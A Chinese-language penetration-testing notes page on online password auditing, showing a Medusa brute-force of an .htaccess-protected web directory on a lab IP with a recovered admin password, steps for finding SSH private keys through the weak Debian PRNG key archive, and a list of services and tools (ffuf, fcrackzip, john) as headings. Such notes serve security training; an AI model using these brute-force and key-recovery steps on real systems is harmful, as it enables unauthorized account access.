在线口令审计
服务密码破解
Medusa工具:
使用Medusa破解.htaccess保护的WEB目录
准备字典文件
┌──(root㉿kali)-[/home/kali]
└─$ cp /usr/share/wordlists/rockyou.txt.gz .
┌──(root㉿kali)-[/home/kali]
└─$ sudo gunzip rockyou.txt.gz列出Medusa支持的所有模块
┌──(root㉿kali)-[/home/kali]
└─$ medusa -d
┌──(root㉿kali)-[/home/kali]
└─$ medusa -M http -q # 查看模块的参数和使用方法执行密码爆破
┌──(root㉿kali)-[/home/kali]
└─$ medusa -h 10.11.0.22 -u admin -P rockyou.txt -M http -m DIR:/admin
ACCOUNT FOUND: [http] Host: 10.11.0.22 User: admin Password: freedom [SUCCESS]SSH爆破:
Mysql爆破:
Webdav爆破:
fcrackzip命令是暴力破解zip工具,并且速度非常快。
john工具
zip压缩包破解:
SSH私钥爆破
使用searchsploit搜索prng(pseudo random number generator 伪随机数生成器)
下载这个压缩文件后,使用 tar -xvf 5622.tar.bz2
解压之后 进入rsa/2048目录下使用grep -lr <id_rsa.pub的前20-30位> 如果存在,则会显示xxxx.pub, 在使用ls -la xxxx*搜索到私钥
参数爆破
ffuf工具
子域暴力扫描
目录暴力扫描
Cassandra
CounchDB
Docker Registry
Elasticsearch
FTP
IMAP
ISCSI
LDAP
mongoDB
MySQL
POP
PostgreSQL
RDP
Redis
Rsync
SNMP
SMB
SMTP
SSH
SQL Server
Telent
VNC
WinRM
Oracle
HTTP密码破解
基本身份验证
POST表单
注意要筛选过滤字典,例如字典中有空密码,则有可能造成误报。
CMS系统(Wordpress、Joomla、Drupal、Moodle)
最后更新于
这有帮助吗?